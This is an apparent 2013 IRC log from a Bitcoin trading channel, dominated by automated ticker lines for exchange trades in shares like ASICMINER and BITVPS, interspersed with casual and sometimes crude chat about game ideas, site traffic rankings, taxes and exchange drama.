[HAVELOCK] [ASICM] 211 @ 0.02499 = 5.2729 BTC [-] Jun 04 23:03:34 [HAVELOCK] [ASICM] 5 @ 0.02499999 = 0.125 BTC [+] Jun 04 23:04:23 mircea_popescu: Doesn't Minecraft (only example I could think of) exist outside that model? Jun 04 23:04:38 [HAVELOCK] [ASICM] 10 @ 0.025 = 0.25 BTC [+] Jun 04 23:05:20 TomServo there are ocasional games published independently, sure. which is why when he asked me if " do you mean you're trying to manage all btc-related games to be developed?" i said no lol. Jun 04 23:05:49 [MPEX] [S.MPOE] 5798 @ 0.00074349 = 4.3108 BTC [+] Jun 04 23:06:23 the model itself is amply criticised, which imo just shows how good it is (much like the fact that fire is so dangerous shows how useful it actually is, since we still use it) Jun 04 23:06:26 he doesn't want to manage them all Jun 04 23:06:30 only the ones that make money Jun 04 23:06:34 exactly imsaguy :) Jun 04 23:06:54 Can I be the official translator? Jun 04 23:06:56 [BTCTC] [ASICMINER-PT] 25 @ 2.476 = 61.9 BTC [-] Jun 04 23:07:03 to what, Assholish ? Jun 04 23:07:19 Understood. I thought you were implying the model was a requirement. Jun 04 23:07:25 I can speak assholish too, but I don't think my above comment was structured as such. Jun 04 23:08:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.0248 = 0.0744 BTC [-] Jun 04 23:08:50 [HAVELOCK] [ASICM] 183 @ 0.0248123 = 4.5407 BTC [-] Jun 04 23:08:52 [HAVELOCK] [ASICM] 6 @ 0.0247 = 0.1482 BTC [-] Jun 04 23:09:07 [BTCTC] [ASICMINER-PT] 1 @ 2.47583 BTC [-] Jun 04 23:09:16 [BTCTC] [ASICMINER-PT] 2 @ 2.4757 = 4.9514 BTC [-] Jun 04 23:09:23 [BTCTC] [ASICMINER-PT] 2 @ 2.4755 = 4.951 BTC [-] Jun 04 23:09:27 [BTCTC] [ASICMINER-PT] 1 @ 2.47501 BTC [-] Jun 04 23:09:29 [BTCTC] [ASICMINER-PT] 4 @ 2.473001 = 9.892 BTC [-] Jun 04 23:09:32 [BTCTC] [ASICMINER-PT] 10 @ 2.473 = 24.73 BTC [-] Jun 04 23:09:36 [BTCTC] [ASICMINER-PT] 2 @ 2.468 = 4.936 BTC [-] Jun 04 23:09:38 [BTCTC] [ASICMINER-PT] 1 @ 2.4662 BTC [-] Jun 04 23:09:42 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [-] Jun 04 23:09:44 [BTCTC] [ASICMINER-PT] 1 @ 2.4641 BTC [-] Jun 04 23:09:44 imsaguy ok ok Jun 04 23:09:45 [BTCTC] [ASICMINER-PT] 1 @ 2.4601 BTC [-] Jun 04 23:09:47 [BTCTC] [ASICMINER-PT] 1 @ 2.4525 BTC [-] Jun 04 23:09:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.02488 = 0.1244 BTC [+] Jun 04 23:09:49 [BTCTC] [ASICMINER-PT] 1 @ 2.45241 BTC [-] Jun 04 23:10:02 well look at that Jun 04 23:10:10 it's a bot. Jun 04 23:10:10 Luke-Jr comes back online and people start dumping asicminer Jun 04 23:10:34 mircea_popescu: you're starting to compete with Chaang-Noi for master of the obvious Jun 04 23:11:13 imsaguy ahahaha, those that make money is good enough for me Jun 04 23:11:20 [BTCTC] [COGNITIVE] 1 @ 0.299999 BTC [+] Jun 04 23:11:21 i humbly submit the goat is merely a slave (and ocasional victim) of the obvious. Jun 04 23:11:41 I could agree to that Jun 04 23:12:59 mircea_popescu thanks for the more detailed info, will have to research this a bit more Jun 04 23:13:10 always a good idea. Jun 04 23:13:20 fifty years from now i will have forgotten everything about ubuntu Jun 04 23:13:25 but i will remember sudo alsa force-reload Jun 04 23:13:34 [BTCTC] [ASICMINER-PT] 1 @ 2.486899 BTC [+] Jun 04 23:13:35 da fuck is so hard about sound Jun 04 23:13:44 Look, you could develop a "hash" game. Market it to retards with graphics cards - $19.99 for the game and they walk around a little and pick shit up. they earn in game pot by "hashing" Jun 04 23:13:47 boom Jun 04 23:13:59 jborkl not a bad idea. Jun 04 23:14:26 .. Jun 04 23:14:33 like stoners will have the patience for that Jun 04 23:14:46 naw, it's the wanna be stoners Jun 04 23:14:54 the neckbeards Jun 04 23:15:08 they want to be cool and hash, but they are too scared Jun 04 23:15:59 Zynga got what $5 billion for letting you farm shit? Jun 04 23:16:17 yeah, that sounds like fun Jun 04 23:17:29 [BTCTC] [ASICMINER-PT] 1 @ 2.4869 BTC [+] Jun 04 23:18:14 [BTCTC] [TAT.ASICMINER] 17 @ 0.024702 = 0.4199 BTC [-] Jun 04 23:18:16 this sounds more like "how much the alternatives suck" than "how good it is" + nobody criticises fire for being dangerous (or no sane person), but there are tons of protections against it @ mircea_popescu> the model itself is amply criticised, which imo just shows how good it is (much like the fact that fire is so dangerous shows how useful it actually is, since we still use it) Jun 04 23:18:58 [BTCTC] [ASICMINER-PT] 2 @ 2.487 = 4.974 BTC [+] Jun 04 23:19:19 [BTCTC] [TAT.ASICMINER] 40 @ 0.02488 = 0.9952 BTC [+] Jun 04 23:19:38 [BTCTC] [BITVPS] 2 @ 0.000829 = 0.0017 BTC [+] Jun 04 23:19:43 [HAVELOCK] [SDICE] 10 @ 0.2344 = 2.344 BTC [+] Jun 04 23:19:45 [BTCTC] [LTC-MINING] 1 @ 0.32 BTC [-] Jun 04 23:23:00 [BTCTC] [S.DICE-PT] 1 @ 0.002573 BTC [+] Jun 04 23:24:04 and SD is up big for the month so far.. Jun 04 23:25:04 [HAVELOCK] [ASICM] 4 @ 0.0249999 = 0.1 BTC [+] Jun 04 23:25:07 i saw that Jun 04 23:25:11 rally time! Jun 04 23:25:13 hehe Jun 04 23:27:15 the 7 stages of a SD noob investor Jun 04 23:27:34 fear, greed, desperation, panic, acceptance,remorse,hope Jun 04 23:27:55 !ticker h him Jun 04 23:27:57 [HAVELOCK:HIM] 1D: 2.77050000 / 2.91501364 / 2.99000000 (44 shares, 128.26059995 BTC), 7D: 2.40000000 / 2.69899689 / 2.99000000 (164 shares, 442.63548995 BTC), 30D: 1.52510000 / 2.27041493 / 2.99000000 (729 shares, 1655.13248296 BTC) Jun 04 23:28:39 wouldnt that make all SD investors noobs? Jun 04 23:28:56 some control emotions better than others Jun 04 23:29:38 like the bots? Jun 04 23:29:41 :) Jun 04 23:30:02 yeah, t least the bots don't bitch on the forum Jun 04 23:30:43 jborkl: that gives me the best idea ever Jun 04 23:30:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.02488 BTC [+] Jun 04 23:30:55 please share Jun 04 23:31:04 a bot forum troll? Jun 04 23:31:10 bitchbot Jun 04 23:31:18 trading bot Jun 04 23:31:26 mpoe-pr already has that job Jun 04 23:31:31 that bitches about bad trades Jun 04 23:31:39 lol, i like it Jun 04 23:31:58 how would it work? Jun 04 23:32:05 like eightball maybe? Jun 04 23:32:24 ;;tradebot What do you think about the SDICE 24hr avg Jun 04 23:32:25 Error: "tradebot" is not a valid command. Jun 04 23:33:02 ;;eightball Will we actually get a tradebot? Jun 04 23:33:03 No clue. Jun 04 23:34:46 omg i'm in the middle of making an AM trade deal with ... a GIRL Jun 04 23:35:18 better use escrow Jun 04 23:38:40 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [+] Jun 04 23:39:29 ... tough room, geez Jun 04 23:48:21 jborkl> Zynga got what $5 billion for letting you farm shit? <<< he has a point. Jun 04 23:48:43 this sounds more like "how much the alternatives suck" << Democracy is the worst system we know Jun 04 23:48:47 except for all the alternatives. Jun 04 23:49:18 ThickAsThieves why escrow ? affraid she'll screw you ? Jun 04 23:49:23 badoom! Jun 04 23:49:46 hehe Jun 04 23:50:42 my first interaction with a bitcoining female Jun 04 23:51:11 maybe she also has a horn on her forehead Jun 04 23:51:22 and is a BFL delivery person Jun 04 23:52:03 case ya missed it https://bitcointalk.org/index.php?PHPSESSID=gg1ao42ivic3791vkm6soslm02&topic=225405.msg2372277#msg2372277 Jun 04 23:53:19 ThickAsThieves so tell her to come here and hang out with the cool dudes Jun 04 23:53:35 say "bitch, be cool" Jun 04 23:54:31 alas, she's canadian Jun 04 23:55:38 [BTCTC] [ASICMINER-PT] 1 @ 2.4858 BTC [-] Jun 04 23:57:59 http://bitcoinwatchdogs.com/news/bitcoin-top-50-who-is-getting-the-most-traffic/ Jun 04 23:58:26 Included: BTCTC.co, Missing: MPEX.co Jun 04 23:58:31 [BTCTC] [ASICMINER-PT] 1 @ 2.4859 BTC [+] Jun 04 23:58:49 [BTCTC] [ASICMINER-PT] 3 @ 2.487 = 7.461 BTC [+] Jun 04 23:58:59 kakobreklaa, I seriously doubt they're intentionally stealing money from customers... Jun 04 23:59:16 i told them they are stealing a year ago Jun 04 23:59:20 response was "it will be fixed" Jun 04 23:59:23 it is not. Jun 05 00:00:15 they meant to say "it will be fixed ... when you least expect it." Jun 05 00:00:27 this was when the old site was up Jun 05 00:00:32 so obviously CSS is a priority Jun 05 00:00:35 over working trading engine Jun 05 00:00:37 FUCKIN RETARDS Jun 05 00:01:09 [BTCTC] [ASICMINER-PT] 1 @ 2.4928 BTC [+] Jun 05 00:01:45 heh, bitbet is missing in the list too Jun 05 00:02:31 ugh i have a real problem in that my interest in doing my IRL work to btc-work ratio is now 1:99 Jun 05 00:02:59 btc is irl Jun 05 00:03:05 thats the problem Jun 05 00:03:25 i dont need the real work anymore, other than as a hedge against bitcoin Jun 05 00:03:36 and the fact that i say that is the problem Jun 05 00:04:52 hows that a problem? Jun 05 00:05:31 because i am neglectful Jun 05 00:05:35 and stuck Jun 05 00:05:50 it's my own business Jun 05 00:05:58 which i have largely dismantled intentionally Jun 05 00:06:05 but still enough left to make some $ Jun 05 00:06:18 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [+] Jun 05 00:06:28 but my attention span for it is horrible Jun 05 00:06:33 it's a mental block Jun 05 00:06:54 hahahaha. were you around when i discovered i'm late for my VAT declaration? Jun 05 00:07:06 i dont recall that Jun 05 00:07:16 i havent filed my taxes yet Jun 05 00:07:21 i was 4 days late in april. they fined me 30 euros then. Jun 05 00:07:22 but the penalty is small Jun 05 00:07:45 i might have even filed for an extension Jun 05 00:07:47 so i strated to be neglectful too... but don't mind it much Jun 05 00:07:47 i forget Jun 05 00:08:58 ThickAsThieves clearly shows how well conducted teh "Study" was. Jun 05 00:09:15 [BTCTC] [MININGCO.ETF] 1 @ 0.7675 BTC [-] Jun 05 00:10:12 it's just cuz you lack CSS Jun 05 00:10:19 i'm not even joking Jun 05 00:11:20 it made me quickly check alexa, both mpex and bitbet have higher rating than plenty of sites on their list Jun 05 00:12:05 interesting Jun 05 00:12:17 maybe the didnt realize mpex is even a bitcoin site Jun 05 00:12:33 is "bitcoin" even mentioned Jun 05 00:12:37 ? Jun 05 00:12:54 not on the home page Jun 05 00:13:51 it's in the title Jun 05 00:14:06 indeed Jun 05 00:14:33 needs more SEO and CSS and TLC Jun 05 00:14:53 these are the fundamentals of finance Jun 05 00:15:00 [BTCTC] [MININGCO.ETF] 1 @ 0.7676 BTC [+] Jun 05 00:15:01 ThickAsThieves: do me a favor Jun 05 00:15:04 stop talking. Jun 05 00:15:17 lol Jun 05 00:15:33 if you don't like it, leave Jun 05 00:15:35 basically, any kid can make fronted to mpex with any css needed Jun 05 00:15:36 jurov mpex is doing like 1mn requests a day. i very much doubt the sum of the list is thear. Jun 05 00:16:14 jurov even the bitstamp guys. Jun 05 00:16:29 if such site would be done well, it would even be possible to claim mpex as own product, lol Jun 05 00:17:10 except for some unimportant bits in STAT output Jun 05 00:18:09 [BTCTC] [BASIC-MINING] 4 @ 0.69 = 2.76 BTC [+] Jun 05 00:19:55 kakobreklaa: yes, do tell nejc to include input for sendig mpex commands and some basic info. for lulz. Jun 05 00:19:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.024879 = 0.0995 BTC [-] Jun 05 00:19:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.024879 = 0.0746 BTC [-] Jun 05 00:20:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02488 BTC [+] Jun 05 00:23:34 [BTCTC] [ASICMINER-PT] 8 @ 2.4858 = 19.8864 BTC [-] Jun 05 00:23:41 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [+] Jun 05 00:28:41 [HAVELOCK] [ASICM] 39 @ 0.025 = 0.975 BTC [+] Jun 05 00:30:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.024879 BTC [-] Jun 05 00:30:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.02488 = 0.0498 BTC [+] Jun 05 00:31:55 http://habrahabr.ru/post/182150/ Diablo-D3, do I read right FSB wants to outlaw Tor in Russia? Jun 05 00:35:33 lol and they had a group "anime against veterans" such hipsters. Jun 05 00:37:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02488 BTC [+] Jun 05 00:39:04 [BTCTC] [S.DICE-PT] 4 @ 0.002573 = 0.0103 BTC [+] Jun 05 00:42:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.024879 BTC [-] Jun 05 00:42:14 [BTCTC] [TAT.ASICMINER] 17 @ 0.02488 = 0.423 BTC [+] Jun 05 00:43:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02488 BTC [+] Jun 05 00:44:53 [BTCTC] [ASICMINER-PT] 1 @ 2.468 BTC [-] Jun 05 00:44:55 [BTCTC] [ASICMINER-PT] 1 @ 2.467 BTC [-] Jun 05 00:44:57 [BTCTC] [ASICMINER-PT] 1 @ 2.4651 BTC [-] Jun 05 00:44:59 [BTCTC] [ASICMINER-PT] 10 @ 2.465 = 24.65 BTC [-] Jun 05 00:45:01 [BTCTC] [ASICMINER-PT] 1 @ 2.456 BTC [-] Jun 05 00:45:02 [BTCTC] [ASICMINER-PT] 1 @ 2.4551 BTC [-] Jun 05 00:45:05 mircea_popescu / kakobreklaa: What's the reason for the eurozone bet rejection? Jun 05 00:45:08 [BTCTC] [ASICMINER-PT] 10 @ 2.455 = 24.55 BTC [-] Jun 05 00:45:12 [BTCTC] [ASICMINER-PT] 2 @ 2.4525 = 4.905 BTC [-] Jun 05 00:45:33 mp will handle that. Jun 05 00:51:09 [HAVELOCK] [ASICM] 10 @ 0.02480023 = 0.248 BTC [-] Jun 05 00:53:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.024879 BTC [-] Jun 05 00:54:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.02488 BTC [+] Jun 05 00:55:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.024879 = 0.0498 BTC [-] Jun 05 00:56:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.02475 = 0.2475 BTC [-] Jun 05 00:56:26 [BTCTC] [TAT.ASICMINER] 59 @ 0.024702 = 1.4574 BTC [-] Jun 05 00:56:27 [BTCTC] [BASIC-MINING] 1 @ 0.670001 BTC [-] Jun 05 00:56:36 [BTCTC] [TAT.ASICMINER] 67 @ 0.024701 = 1.655 BTC [-] Jun 05 00:57:50 [HAVELOCK] [ASICM] 42 @ 0.0246501 = 1.0353 BTC [-] Jun 05 00:57:51 [HAVELOCK] [ASICM] 500 @ 0.02465 = 12.325 BTC [-] Jun 05 00:57:53 [HAVELOCK] [ASICM] 349 @ 0.02460021 = 8.5855 BTC [-] Jun 05 00:57:53 [HAVELOCK] [ASICM] 2 @ 0.0246002 = 0.0492 BTC [-] Jun 05 00:57:54 [HAVELOCK] [ASICM] 57 @ 0.0246 = 1.4022 BTC [-] Jun 05 00:58:54 [BTCTC] [B.YABMC] 31 @ 0.015052 = 0.4666 BTC [-] Jun 05 01:02:55 [BTCTC] [BITVPS] 100 @ 0.00072 = 0.072 BTC [-] Jun 05 01:03:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.02487 BTC [+] Jun 05 01:03:20 [BTCTC] [BITVPS] 2 @ 0.000709 = 0.0014 BTC [-] Jun 05 01:03:21 [BTCTC] [BITVPS] 500 @ 0.000708 = 0.354 BTC [-] Jun 05 01:03:44 [BTCTC] [BITVPS] 11 @ 0.000707 = 0.0078 BTC [-] Jun 05 01:03:46 [BTCTC] [BITVPS] 10 @ 0.000706 = 0.0071 BTC [-] Jun 05 01:03:48 [BTCTC] [BITVPS] 5 @ 0.000704 = 0.0035 BTC [-] Jun 05 01:03:59 [BTCTC] [BITVPS] 213 @ 0.000704 = 0.15 BTC [-] Jun 05 01:04:01 [BTCTC] [BITVPS] 9 @ 0.000702 = 0.0063 BTC [-] Jun 05 01:04:05 [BTCTC] [BITVPS] 112 @ 0.0007 = 0.0784 BTC [-] Jun 05 01:04:10 [BTCTC] [BITVPS] 100 @ 0.0007 = 0.07 BTC [-] Jun 05 01:04:22 [BTCTC] [BITVPS] 100 @ 0.00069 = 0.069 BTC [-] Jun 05 01:04:27 [BTCTC] [BITVPS] 30 @ 0.000682 = 0.0205 BTC [-] Jun 05 01:04:28 [BTCTC] [BITVPS] 100 @ 0.00068 = 0.068 BTC [-] Jun 05 01:04:30 [BTCTC] [BITVPS] 100 @ 0.00067 = 0.067 BTC [-] Jun 05 01:04:32 [BTCTC] [BITVPS] 100 @ 0.000663 = 0.0663 BTC [-] Jun 05 01:05:09 [BTCTC] [BITVPS] 1 @ 0.00066 BTC [-] Jun 05 01:05:11 [BTCTC] [BITVPS] 50 @ 0.000636 = 0.0318 BTC [-] Jun 05 01:05:13 [BTCTC] [BITVPS] 3 @ 0.000632 = 0.0019 BTC [-] Jun 05 01:05:15 [BTCTC] [BITVPS] 10 @ 0.000622 = 0.0062 BTC [-] Jun 05 01:05:17 [BTCTC] [BITVPS] 100 @ 0.00062 = 0.062 BTC [-] Jun 05 01:05:19 [BTCTC] [BITVPS] 10 @ 0.000614 = 0.0061 BTC [-] Jun 05 01:05:22 [BTCTC] [BITVPS] 108 @ 0.000613 = 0.0662 BTC [-] Jun 05 01:05:23 ;;bc,stats Jun 05 01:05:24 [BTCTC] [BITVPS] 10 @ 0.000611 = 0.0061 BTC [-] Jun 05 01:05:25 oh man someone is shorting bitvps Jun 05 01:05:25 [BTCTC] [BITVPS] 10 @ 0.000593 = 0.0059 BTC [-] Jun 05 01:05:26 [BTCTC] [BITVPS] 1000 @ 0.000593 = 0.593 BTC [-] Jun 05 01:05:30 [BTCTC] [BITVPS] 4000 @ 0.000592 = 2.368 BTC [-] Jun 05 01:05:43 !ticker btctc bitvps Jun 05 01:05:45 [BTCT:BITVPS] 1D: 0.0007 / 0.00074 / 0.000833 (1905 shares, 1.4 BTC), 7D: 0.000591 / 0.0007 / 0.001 (14188 shares, 10 BTC), 30D: 0.00051 / 0.00074 / 0.00169 (62031 shares, 45.7 BTC) Jun 05 01:05:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.02487 BTC [+] Jun 05 01:06:34 [BTCTC] [S.DICE-PT] 39 @ 0.002573 = 0.1003 BTC [+] Jun 05 01:07:28 gribble wherefor art thou? Jun 05 01:10:11 [BTCTC] [S.DICE-PT] 8 @ 0.002452 = 0.0196 BTC [-] Jun 05 01:12:29 [HAVELOCK] [ASICM] 13 @ 0.0247 = 0.3211 BTC [+] Jun 05 01:13:06 [BTCTC] [BITVPS] 408 @ 0.000611 = 0.2493 BTC [+] Jun 05 01:13:08 [BTCTC] [BITVPS] 1 @ 0.00061 BTC [-] Jun 05 01:13:09 [BTCTC] [BITVPS] 100 @ 0.0006 = 0.06 BTC [-] Jun 05 01:17:49 cmon guys Jun 05 01:17:49 push those bids higher Jun 05 01:18:00 [BTCTC] [BASIC-MINING] 1 @ 0.670001 BTC [-] Jun 05 01:18:09 [BTCTC] [BASIC-MINING] 4 @ 0.67 = 2.68 BTC [-] Jun 05 01:19:07 why are you exiting, if I may ask? Jun 05 01:19:24 [BTCTC] [BITVPS] 1 @ 0.00062 BTC [+] Jun 05 01:19:25 [BTCTC] [BITVPS] 10 @ 0.000613 = 0.0061 BTC [-] Jun 05 01:19:27 [BTCTC] [BITVPS] 25 @ 0.000612 = 0.0153 BTC [-] Jun 05 01:19:28 [BTCTC] [BITVPS] 100 @ 0.000611 = 0.0611 BTC [-] Jun 05 01:19:53 ThickAsThieves: just done Jun 05 01:20:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.024869 = 0.2487 BTC [-] Jun 05 01:20:06 it wasnt was i was expecting Jun 05 01:21:11 word Jun 05 01:22:40 We aren't getting paid is the issue, other than attributing some of our owners stake based on work done. Jun 05 01:23:20 Not sure the exact reasons he wanted to leave tho. Jun 05 01:24:32 [BTCTC] [BITVPS] 1 @ 0.00062 BTC [+] Jun 05 01:24:34 [BTCTC] [BITVPS] 1000 @ 0.000611 = 0.611 BTC [-] Jun 05 01:24:35 [BTCTC] [BITVPS] 900 @ 0.000611 = 0.5499 BTC [-] Jun 05 01:25:02 I know he aced some Rackspace interviews. He might leave for Rackspace like phungus eh. =P Jun 05 01:25:28 Would be a much better pay than what we can give right now =/ Jun 05 01:25:49 [BTCTC] [ASICMINER-PT] 1 @ 2.4879 BTC [+] Jun 05 01:26:00 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [+] Jun 05 01:26:12 [BTCTC] [ASICMINER-PT] 1 @ 2.4888 BTC [+] Jun 05 01:26:21 [BTCTC] [ASICMINER-PT] 2 @ 2.4889 = 4.9778 BTC [+] Jun 05 01:26:49 [BTCTC] [TAT.ASICMINER] 11 @ 0.024869 = 0.2736 BTC [-] Jun 05 01:28:32 [BTCTC] [BITVPS] 50 @ 0.000611 = 0.0306 BTC [-] Jun 05 01:29:15 [BTCTC] [ASICMINER-PT] 1 @ 2.4889 BTC [+] Jun 05 01:33:16 [BTCTC] [ASICMINER-PT] 2 @ 2.4889 = 4.9778 BTC [+] Jun 05 01:36:17 [BTCTC] [S.DICE-PT] 8 @ 0.002572 = 0.0206 BTC [+] Jun 05 01:36:43 [BTCTC] [S.DICE-PT] 171 @ 0.002573 = 0.44 BTC [+] Jun 05 01:38:19 [BTCTC] [S.DICE-PT] 601 @ 0.002574 = 1.547 BTC [+] Jun 05 01:45:40 [BTCTC] [PAJKA.BOND] 1 @ 0.105101 BTC [+] Jun 05 01:45:50 [BTCTC] [PAJKA.BOND] 5 @ 0.1051 = 0.5255 BTC [-] Jun 05 01:45:53 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Jun 05 01:54:08 [BTCTC] [BASIC-MINING] 1 @ 0.689999 BTC [+] Jun 05 01:55:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.024749 BTC [-] Jun 05 01:57:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.02475 = 0.0495 BTC [+] Jun 05 01:58:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02475 BTC [+] Jun 05 02:03:44 [HAVELOCK] [ASICM] 8 @ 0.02489989 = 0.1992 BTC [+] Jun 05 02:05:10 [MPEX] [S.MPOE] 1283 @ 0.00076018 = 0.9753 BTC [+] Jun 05 02:05:12 [BTCTC] [RSM] 1 @ 0.0085 BTC [-] Jun 05 02:05:28 [BTCTC] [RSM] 221 @ 0.008499 = 1.8783 BTC [-] Jun 05 02:14:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.02474 = 0.1237 BTC [-] Jun 05 02:22:05 bitcoin is just so much lol and drama. It's gonna be sad when I have to start working again next month. Jun 05 02:23:14 [BTCTC] [TAT.ASICMINER] 28 @ 0.02475 = 0.693 BTC [+] Jun 05 02:23:54 [BTCTC] [BITVPS] 10 @ 0.000708 = 0.0071 BTC [+] Jun 05 02:24:39 [BTCTC] [TAT.ASICMINER] 12 @ 0.0248 = 0.2976 BTC [+] Jun 05 02:28:29 Start working in Bitcoin instead then... Jun 05 02:30:30 [BTCTC] [ASICMINER-PT] 1 @ 2.4888 BTC [-] Jun 05 02:30:33 So 4 weeks ago yesterday I posted some dude in Thailand a bitcoin, sent from Bangkok. It arrived yesterday. 4 weeks! Sheesh. Jun 05 02:30:50 I thought Italy's postal service was shite. Jun 05 02:31:42 Namworld: would do, but need to renew my visa, otherwise I get kicked out. Won't be able to do that with a BTC job, sadly. In a couple of years maybe... Jun 05 02:34:16 eh Jun 05 02:39:00 [HAVELOCK] [ASICM] 13 @ 0.02461004 = 0.3199 BTC [-] Jun 05 02:39:02 [HAVELOCK] [ASICM] 13 @ 0.02461003 = 0.3199 BTC [-] Jun 05 02:39:03 [HAVELOCK] [ASICM] 40 @ 0.02461 = 0.9844 BTC [-] Jun 05 02:39:04 [HAVELOCK] [ASICM] 23 @ 0.0246 = 0.5658 BTC [-] Jun 05 02:39:05 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [-] Jun 05 02:39:05 [HAVELOCK] [ASICM] 10 @ 0.0246 = 0.246 BTC [-] Jun 05 02:39:19 [MPEX] [S.BBET] 2500 @ 0.00085 = 2.125 BTC [-] Jun 05 02:39:21 [MPEX] [S.BBET] 10000 @ 0.00079501 = 7.9501 BTC [-] Jun 05 02:39:22 [MPEX] [S.BBET] 86400 @ 0.000795 = 68.688 BTC [-] Jun 05 02:40:05 [BTCTC] [ASICMINER-PT] 1 @ 2.4888 BTC [-] Jun 05 02:41:23 [BTCTC] [BASIC-MINING] 2 @ 0.69 = 1.38 BTC [+] Jun 05 02:41:26 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jun 05 02:43:51 [HAVELOCK] [KCIM] 1 @ 1.1211 BTC [+] Jun 05 02:43:52 [HAVELOCK] [KCIM] 2 @ 1.121 = 2.242 BTC [-] Jun 05 02:44:17 [HAVELOCK] [ASICM] 150 @ 0.0246 = 3.69 BTC [-] Jun 05 02:44:52 [HAVELOCK] [VTX] 2 @ 0.42501 = 0.85 BTC [-] Jun 05 02:44:54 [HAVELOCK] [HIM] 1 @ 2.9899 BTC [-] Jun 05 02:48:10 [BTCTC] [BASIC-MINING] 3 @ 0.69 = 2.07 BTC [+] Jun 05 02:49:38 some defense https://bitcointalk.org/index.php?topic=224745.msg2373670#msg2373670 Jun 05 02:51:04 [BTCTC] [ESECURITYSABTC] 1 @ 0.317488 BTC [-] Jun 05 02:53:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.0248 = 0.0992 BTC [+] Jun 05 03:03:08 [HAVELOCK] [ASICM] 5 @ 0.0246 = 0.123 BTC [-] Jun 05 03:06:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.024741 BTC [-] Jun 05 03:06:55 [BTCTC] [TAT.ASICMINER] 7 @ 0.02474 = 0.1732 BTC [-] Jun 05 03:06:56 [BTCTC] [TAT.ASICMINER] 21 @ 0.024703 = 0.5188 BTC [-] Jun 05 03:06:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.024701 = 0.1482 BTC [-] Jun 05 03:07:02 [BTCTC] [TAT.ASICMINER] 65 @ 0.02468 = 1.6042 BTC [-] Jun 05 03:09:55 <[\\\]> Namworld, who were you talking about? Jun 05 03:10:47 <[\\\]> oh, bitfinex got hacked? Jun 05 03:10:48 <[\\\]> lol Jun 05 03:11:11 For which statement? Jun 05 03:12:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.024799 BTC [+] Jun 05 03:12:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.0248 = 0.124 BTC [+] Jun 05 03:13:24 i took my coins off bitfinex Jun 05 03:13:36 not putting anymore coins there Jun 05 03:15:13 just like you fail at being nice kakobreklaa Jun 05 03:15:21 <[\\\]> Namworld, people leaving Jun 05 03:15:28 lol Jun 05 03:15:59 Namworld: what is this drama going on with bitvps? Jun 05 03:16:05 D34TH was pretty pissed off Jun 05 03:16:18 sold ALL of his stock in the company Jun 05 03:17:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.0248 = 0.0744 BTC [+] Jun 05 03:18:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.0248 = 0.124 BTC [+] Jun 05 03:19:12 trollololol Jun 05 03:21:18 zebedee_ you'll have to be more specific. Jun 05 03:36:04 arent they adding ltc Jun 05 03:36:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.024681 BTC [-] Jun 05 03:37:48 lol tsup pirateat40 you are famous I read about you on coinlab's website lololol Jun 05 03:37:52 boom Jun 05 03:37:55 [BTCTC] [BITVPS] 4 @ 0.000611 = 0.0024 BTC [-] Jun 05 03:37:57 [BTCTC] [BITVPS] 15 @ 0.000601 = 0.009 BTC [-] Jun 05 03:37:59 [BTCTC] [BITVPS] 100 @ 0.0006 = 0.06 BTC [-] Jun 05 03:40:42 shit you know you're famous when you're on coinlab's website Jun 05 03:41:02 ? Jun 05 03:41:54 [BTCTC] [PAJKA.BOND] 1 @ 0.108949 BTC [+] Jun 05 03:41:57 [BTCTC] [PAJKA.BOND] 2 @ 0.10895 = 0.2179 BTC [+] Jun 05 03:41:59 [BTCTC] [PAJKA.BOND] 2 @ 0.108956 = 0.2179 BTC [+] Jun 05 03:42:03 [BTCTC] [PAJKA.BOND] 26 @ 0.10897 = 2.8332 BTC [+] Jun 05 03:42:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02468 BTC [-] Jun 05 03:46:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.02468 BTC [-] Jun 05 03:48:17 [BTCTC] [GSDPT] 3 @ 0.0032 = 0.0096 BTC [+] Jun 05 03:49:59 [BTCTC] [ASICMINER-PT] 1 @ 2.457 BTC [-] Jun 05 03:50:00 [BTCTC] [ASICMINER-PT] 1 @ 2.4514 BTC [-] Jun 05 03:50:02 [BTCTC] [ASICMINER-PT] 1 @ 2.4513 BTC [-] Jun 05 03:50:05 [BTCTC] [ASICMINER-PT] 1 @ 2.4512 BTC [-] Jun 05 03:50:16 [BTCTC] [ASICMINER-PT] 1 @ 2.4511 BTC [-] Jun 05 03:50:19 [BTCTC] [ASICMINER-PT] 10 @ 2.451 = 24.51 BTC [-] Jun 05 03:57:12 [BTCTC] [ASICMINER-PT] 1 @ 2.484 BTC [+] Jun 05 03:58:22 